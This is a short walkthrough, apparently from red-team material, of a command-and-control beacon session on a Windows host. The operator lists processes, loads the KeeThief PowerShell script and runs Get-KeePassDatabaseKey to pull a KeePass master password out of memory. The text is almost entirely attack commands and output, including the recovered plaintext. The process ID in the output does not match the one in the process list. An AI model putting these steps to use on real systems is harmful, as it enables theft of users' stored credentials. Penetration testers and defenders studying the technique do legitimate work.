We will use KeeThief to recover the KeePass database key from the running KeePass.exe process.
GitHub: https://github.com/GhostPack/KeeThief
beacon> ps
[*] Tasked beacon to list processes
[+] host called home, sent: 12 bytes
[*] Process List
PID    PPID  Name              Arch  Session  User
---    ----  ----              ----  -------  -----
0      0     [System Process]
4      0     System
68     4     Registry
100    548   svchost.exe
308    4     smss.exe
[SNIP]
10196  4968  KeePass.exe       x64   1        COVERTIUS\mnelson
10336  5944  regsvr32.exe      x64   1        COVERTIUS\mnelson
beacon> powershell-import
[*] Tasked beacon to import: /root/Tools/KeeThief/PowerShell/KeeThief.ps1
[+] host called home, sent: 358320 bytes
beacon> powerpick Get-KeePassDatabaseKey
[+] host called home, sent: 10 bytes
[*] Tasked beacon to run: Get-KeePassDatabaseKey (unmanaged)
[+] host called home, sent: 133705 bytes
[+] received output:
Database : C:\Users\Public\Desktop\KeePass-2.35\MySecrets.kdbx
KeyType : KcpPassword
KeePassVersion : 2.35.0.0
ProcessID : 4784
ExecutablePath : C:\Users\Public\Desktop\KeePass-2.35\KeePass.exe
EncryptedBlobAddress : 46338032
EncryptedBlob : {148, 171, 5, 208...}
EncryptedBlobLen : 32
PlaintextBlob : {80, 97, 115, 115...}
Plaintext : PasswordPasswordPassword